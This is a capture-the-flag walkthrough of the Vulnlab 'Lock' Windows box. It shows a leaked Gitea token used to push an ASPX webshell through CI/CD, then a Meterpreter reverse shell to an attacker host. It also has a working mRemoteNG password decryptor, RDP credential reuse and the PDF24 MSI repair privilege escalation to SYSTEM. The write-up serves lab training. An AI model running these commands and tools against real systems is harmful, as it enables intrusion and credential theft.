Here are my notes on the LOCK box from Vulnlab, which was deployed to Hack The Box.
LOCK: 10.10.67.86
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Lock - Index
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
smbclient -N -L 10.10.67.86
session setup failed: NT_STATUS_ACCESS_DENIED
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=09d2fa0850069bd9; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=TRqsfIBdcW2dOMeZd6j8_RCXyr46MTczMTQyOTQyNTQ2MzY0OTgwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
- Port 3000 is a Gitea instance, version 1.21.3.
Explore section:
The public repo ellen.freeman/dev-scripts contains repos.py (ellen.freeman/dev-scripts/repos.py).
The commit below contains a hardcoded Gitea personal access token:
http://10.10.67.86:3000/ellen.freeman/dev-scripts/commit/8b78e6c3024416bce55926faa3f65421a25d6370
PERSONAL_ACCESS_TOKEN = '43ce39bb0bd6bc489284f2905f033ca467a6362f'
Got a token.
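As an added example (not part of the original notes and not code from the dev-scripts repo), the Python below scans `git log -p --all` output for 40-hex Gitea-style tokens and reports which commit added or removed each one. It makes the point behind the finding above: a token that has since been replaced in the current version of repos.py is still fully readable in the commit that introduced it. The sample log is constructed (commit hashes, commit messages and the environment-variable rewrite are made up); only the token value and the e-mail address come from these notes.

```python
"""Scan `git log -p --all` output for Gitea-style personal access tokens.

Added example for the Lock notes, not the repo's own code. Gitea tokens are
40 lowercase hex characters, so a simple regex over the diff lines finds them;
the parser tracks the current commit and file so each hit can be attributed.
"""
import re

TOKEN_RE = re.compile(r"\b[0-9a-f]{40}\b")
COMMIT_RE = re.compile(r"^commit ([0-9a-f]{40})")


def find_token_changes(log_text):
    """Return [(commit, path, action, token)] for every diff line that carries a token.

    action is 'added' for '+' lines and 'removed' for '-' lines. Commit headers,
    index lines and diff file headers are skipped so their own hashes are not
    reported as tokens.
    """
    findings = []
    commit = path = None
    for line in log_text.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            commit = m.group(1)
            continue
        if line.startswith("+++ "):               # new-side file header: remember the path
            path = line[4:]
            if path.startswith("b/"):
                path = path[2:]
            continue
        if line.startswith(("--- ", "index ", "diff ", "@@")):
            continue
        if line[:1] in ("+", "-"):
            action = "added" if line[0] == "+" else "removed"
            for token in TOKEN_RE.findall(line[1:]):
                findings.append((commit, path, action, token))
    return findings


def ever_committed(findings):
    """Every token that was added at any point in history is exposed to anyone with read access."""
    return sorted({t for _, _, action, t in findings if action == "added"})


def later_removed(findings):
    """Tokens that were removed again: the 'fix' that does not revoke anything."""
    added = {t for _, _, a, t in findings if a == "added"}
    removed = {t for _, _, a, t in findings if a == "removed"}
    return sorted(added & removed)


# Constructed sample: two commits, newest first, as `git log -p` prints them.
# Hashes and messages are made up; the token is the one found in dev-scripts.
SAMPLE_LOG = """\
commit 0000000000000000000000000000000000000002
Author: Ellen Freeman <ellen.freeman@lock.vl>

    read the token from the environment instead

diff --git a/repos.py b/repos.py
--- a/repos.py
+++ b/repos.py
@@ -1,2 +1,3 @@
-PERSONAL_ACCESS_TOKEN = '43ce39bb0bd6bc489284f2905f033ca467a6362f'
+import os
+PERSONAL_ACCESS_TOKEN = os.environ['GITEA_ACCESS_TOKEN']

commit 0000000000000000000000000000000000000001
Author: Ellen Freeman <ellen.freeman@lock.vl>

    add repos.py

diff --git a/repos.py b/repos.py
--- /dev/null
+++ b/repos.py
@@ -0,0 +1 @@
+PERSONAL_ACCESS_TOKEN = '43ce39bb0bd6bc489284f2905f033ca467a6362f'
"""

if __name__ == "__main__":
    import sys
    # Pipe real history in: git log -p --all | python3 scan_tokens.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    for commit, path, action, token in find_token_changes(text):
        print(f"{commit[:12]} {action:7} {path}: {token}")
```

The second commit in the sample removes the token from the file, yet ever_committed() still lists it; the only fix that works is revoking the token in Gitea (and ideally rewriting history). Run it on real history with `git log -p --all` piped to the script.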
┌──(root㉿kali)-[/home/kali/VULNLAB/LOCK/10.10.67.86]
└─# export GITEA_ACCESS_TOKEN="43ce39bb0bd6bc489284f2905f033ca467a6362f"
┌──(root㉿kali)-[/home/kali/VULNLAB/LOCK/10.10.67.86]
└─# python3 repos.py http://10.10.67.86:3000
Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/website
Checking the token against the Gitea API (either as an Authorization header or as the access_token query parameter):
curl -H "Authorization: token 43ce39bb0bd6bc489284f2905f033ca467a6362f" http://10.10.67.86:3000/api/v1/user/repos
http://10.10.67.86:3000/api/v1/user?access_token=43ce39bb0bd6bc489284f2905f033ca467a6362f
{"id":2,"login":"ellen.freeman","login_name":"","full_name":"","email":"ellen.freeman@lock.vl","avatar_url":"http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74","language":"en-US","is_admin":false,"last_login":"2023-12-28T11:38:25-08:00","created":"2023-12-27T11:13:10-08:00","restricted":false,"active":true,"prohibit_login":false,"location":"","website":"","description":"","visibility":"public","followers_count":0,"following_count":0,"starred_repos_count":0,"username":"ellen.freeman"}
git clone http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.67.86:3000/ellen.freeman/dev-scripts.git
git clone http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.67.86:3000/ellen.freeman/website.git
# The website repo is the source of the site served on TCP port 80.
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# ls
assets changelog.txt index.html readme.md
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# cat readme.md
# New Project Website
CI/CD integration is now active - changes to the repository will automatically be deployed to the webserver
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# cat changelog.txt
# Changelog
- Added first website version
Pushing a file to the website repo with the access token (readme.md says pushes are auto-deployed to the webserver):
cd website
echo "This is a new example text file." > example.txt
git add example.txt
git config --global user.name "Kali"
git config --global user.email "kali@kali.com"
git commit -m "Added example.txt file"
git push http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.67.86:3000/ellen.freeman/website.git main
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# echo "hello word" > test.txt
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git add test.txt
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git config --global user.name "Kali"
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git config --global user.email "kali@kali.com"
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git commit -m "Added example text file"
[main 31c6c33] Added example text file
1 file changed, 1 insertion(+)
create mode 100644 test.txt
git push http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.67.86:3000/ellen.freeman/website.git main
After a few seconds test.txt is served on TCP port 80 (http://10.10.67.86/test.txt), so a push to main lands in the IIS webroot automatically.
Since that works, push a malicious ASPX file to get a webshell:
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# cp /usr/share/webshells/aspx/cmdasp.aspx .
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git add cmdasp.aspx
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git commit -m "Malicious File"
[main ddfd234] Malicious File
1 file changed, 42 insertions(+)
create mode 100644 cmdasp.aspx
┌──(root㉿kali)-[/home/…/VULNLAB/LOCK/10.10.67.86/website]
└─# git push http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.67.86:3000/ellen.freeman/website.git main
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 4 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 982 bytes | 982.00 KiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.67.86:3000/ellen.freeman/website.git
31c6c33..ddfd234 main -> main
http://10.10.67.86/cmdasp.aspx
#Webshell GAINED on TCP port 80 !
Upgrade the webshell to a proper user shell as usual (here a Meterpreter reverse TCP payload caught with multi/handler):
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.8.0.71:1234
[*] Sending stage (200774 bytes) to 10.10.67.86
[*] Meterpreter session 1 opened (10.8.0.71:1234 -> 10.10.67.86:50390) at 2024-11-12 13:16:36 -0500
meterpreter > shell
Process 3244 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
lock\ellen.freeman
c:\windows\system32\inetsrv>hostname
hostname
Lock
POST-EXPLOITATION:
The IIS shell already runs as lock\ellen.freeman (the site evidently runs under her account rather than a built-in app pool identity), so her profile is readable.
ellen.freeman -> gale.dekarios:
c:\Users\ellen.freeman>type .git-credentials
type .git-credentials
http://ellen.freeman:YWFrWJk9uButLeqx@localhost:3000
c:\Users\ellen.freeman>type .gitconfig
type .gitconfig
[user]
email = ellen.freeman@oplock.vl
name = Ellen Freeman
[safe]
directory = C:/inetpub/wwwroot
[credential "http://localhost:3000"]
provider = generic
# ellen.freeman:YWFrWJk9uButLeqx is her Gitea password; it does not work for SSH.
c:\Users\ellen.freeman\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is A03D-9CEF
Directory of c:\Users\ellen.freeman\Documents
12/28/2023 05:59 AM <DIR> .
12/28/2023 11:36 AM <DIR> ..
12/28/2023 05:59 AM 3,341 config.xml
1 File(s) 3,341 bytes
2 Dir(s) 8,384,368,640 bytes free
c:\Users\ellen.freeman\Documents>type config.xml
type config.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFp" ConfVersion="2.6">
<Node Name="RDP/Gale" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="a179606a-a854-48a6-9baa-491d8eb3bddc" Username="Gale.Dekarios" Domain="" Password="TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw==" Hostname="Lock" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true"
[SNIP]
config.xml is an mRemoteNG connections file. The RDP/Gale node holds an RDP credential for Gale.Dekarios, encrypted with mRemoteNG's default master password, which mremoteng_decrypt.py recovers:
python3 mremoteng_decrypt.py -s "TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw=="
Password: ty8wnW9qCKDosXo6
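As an added example (not part of the original notes and not mRemoteNG's own source), the Python below reimplements what mremoteng_decrypt.py does for this file format, so the decryption is not a black box: each Password or Protected attribute is base64(salt[16] || nonce[16] || ciphertext || GCM tag[16]), the key is PBKDF2-HMAC-SHA1(master password, salt, KdfIterations, 32 bytes), and the salt doubles as the GCM associated data. When no master password has been set, mRemoteNG uses the built-in key "mR3m", which is why the script above needed no password argument. The sample file is constructed from the Protected value and the RDP/Gale node shown in config.xml above; the block needs the `cryptography` package (or pycryptodome as a fallback).

```python
"""Decrypt passwords from an mRemoteNG connections file (confCons.xml / config.xml).

Added example for the Lock notes; reimplements the scheme used by the public
mremoteng_decrypt.py script (ConfVersion 2.6, EncryptionEngine AES, GCM mode).
"""
import base64
import hashlib
import xml.etree.ElementTree as ET

try:
    from cryptography.exceptions import InvalidTag as BadTag
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def _aes_gcm_open(key, nonce, body, aad):
        return AESGCM(key).decrypt(nonce, body, aad)          # body = ciphertext || tag
except ImportError:                                           # fallback: pycryptodome
    from Crypto.Cipher import AES
    BadTag = ValueError

    def _aes_gcm_open(key, nonce, body, aad):
        c = AES.new(key, AES.MODE_GCM, nonce=nonce)
        c.update(aad)
        return c.decrypt_and_verify(body[:-16], body[-16:])

DEFAULT_MASTER_PASSWORD = "mR3m"   # mRemoteNG's built-in key when the user set none


def decrypt_field(b64_value, master_password=DEFAULT_MASTER_PASSWORD, iterations=1000):
    """Decrypt one Password/Protected attribute; raises BadTag if the key is wrong."""
    blob = base64.b64decode(b64_value)
    salt, nonce, body = blob[:16], blob[16:32], blob[32:]
    key = hashlib.pbkdf2_hmac("sha1", master_password.encode(), salt, iterations, dklen=32)
    return _aes_gcm_open(key, nonce, body, salt).decode("utf-8")


def master_password_is(protected_attr, candidate, iterations=1000):
    """The root Protected attribute encrypts a fixed marker string, so it works as
    a key check: True when `candidate` is the master password of the file."""
    try:
        marker = decrypt_field(protected_attr, candidate, iterations)
    except BadTag:
        return False
    return marker in ("ThisIsNotProtected", "ThisIsProtected")


def extract_credentials(xml_text, master_password=DEFAULT_MASTER_PASSWORD):
    """Return [(node name, hostname, username, cleartext password)] for each Connection node."""
    root = ET.fromstring(xml_text)
    iterations = int(root.get("KdfIterations", "1000"))
    creds = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        enc = node.get("Password", "")
        pw = decrypt_field(enc, master_password, iterations) if enc else ""
        creds.append((node.get("Name"), node.get("Hostname"), node.get("Username"), pw))
    return creds


# Constructed input: a minimal file built from the root attributes and the
# RDP/Gale node of the config.xml found in ellen.freeman's Documents folder.
SAMPLE_CONFIG = """\
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFp" ConfVersion="2.6">
  <Node Name="RDP/Gale" Type="Connection" Username="Gale.Dekarios" Domain="" Password="TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw==" Hostname="Lock" Protocol="RDP" Port="3389" />
</mrng:Connections>
"""

if __name__ == "__main__":
    root = ET.fromstring(SAMPLE_CONFIG)
    print("default master password:", master_password_is(root.get("Protected"), DEFAULT_MASTER_PASSWORD))
    for name, host, user, pw in extract_credentials(SAMPLE_CONFIG):
        print(f"{name}: {user}@{host} -> {pw}")
```

The Protected attribute is the cheap check to run first: if it does not decrypt with "mR3m", the user set a real master password and the node passwords cannot be recovered without it (or a wordlist run through master_password_is).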
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Lock
| Not valid before: 2024-11-11T16:31:12
|_Not valid after: 2025-05-13T16:31:12
| rdp-ntlm-info:
| Target_Name: LOCK
| NetBIOS_Domain_Name: LOCK
| NetBIOS_Computer_Name: LOCK
| DNS_Domain_Name: Lock
| DNS_Computer_Name: Lock
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-12T16:31:50+00:00
|_ssl-date: 2024-11-12T16:32:30+00:00; -53m49s from scanner time.
hydra -l gale.dekarios -p ty8wnW9qCKDosXo6 -u -f -t 1 10.10.67.86 rdp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:31:07
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking rdp://10.10.67.86:3389/
[3389][rdp] host: 10.10.67.86 login: gale.dekarios password: ty8wnW9qCKDosXo6
[STATUS] attack finished for 10.10.67.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:31:10
# Credential chain so far: Gitea token in a public commit -> CI/CD webshell as ellen.freeman -> mRemoteNG config.xml -> gale.dekarios RDP.
xfreerdp /u:gale.dekarios /p:'ty8wnW9qCKDosXo6' /v:10.10.67.86 /drive:share,.
USER.TXT: VL{REDACTED}
PRIV ESC:
PDF24 Creator 11.15.1 is installed (installer in C:\_install, see below).
This version is vulnerable to local privilege escalation via the MSI installer's repair function (SEC Consult advisory):
https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-msi-installer-in-pdf24-creator-geek-software-gmbh/
C:\>dir /adh
Volume in drive C has no label.
Volume Serial Number is A03D-9CEF
Directory of C:\
12/28/2023 06:17 AM <DIR> $Recycle.Bin
12/27/2023 12:38 PM <DIR> $WinREAgent
12/27/2023 06:14 PM <JUNCTION> Documents and Settings [C:\Users]
12/28/2023 11:24 AM <DIR> ProgramData
12/27/2023 06:14 PM <DIR> Recovery
12/27/2023 06:14 PM <DIR> System Volume Information
12/28/2023 11:23 AM <DIR> _install
0 File(s) 0 bytes
7 Dir(s) 8,390,303,744 bytes free
C:\>cd _install
C:\_install>dir
Volume in drive C has no label.
Volume Serial Number is A03D-9CEF
Directory of C:\_install
12/28/2023 11:21 AM 60,804,608 Firefox Setup 121.0.msi
12/28/2023 05:39 AM 43,593,728 mRemoteNG-Installer-1.76.20.24615.msi
12/14/2023 10:07 AM 462,602,240 pdf24-creator-11.15.1-x64.msi
3 File(s) 567,000,576 bytes
0 Dir(s) 8,390,303,744 bytes free
C:\_install>
https://github.com/googleprojectzero/symboliclink-testing-tools
# Requires two commands as gale.dekarios (SetOpLock.exe is from the Project Zero symboliclink-testing-tools above; it blocks while the oplock is held, so run msiexec from a second window):
SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r
msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi
The repair (/fa) runs pdf24-PrinterInstall.exe as SYSTEM; while the oplock on faxPrnInst.log is held, that process blocks and the cmd window it opened does not close. From that window a SYSTEM shell can be spawned:
1) right click on the title bar of the cmd window
2) click on Properties
3) under Options click on the "Legacy console mode" link
4) open the link with a browser other than Internet Explorer or Edge (on Windows 11 neither opens as SYSTEM); Firefox is installed on this box, see C:\_install
5) in the opened browser window press CTRL+O
6) type cmd.exe in the file-open dialog's path field and press Enter
SYSTEM-SHELL !
ROOT.TXT: VL{REDACTED}
Remaining nmap output from the initial scan, for completeness:
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -53m49s, deviation: 0s, median: -53m49s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-11-12T16:31:50
|_ start_date: N/A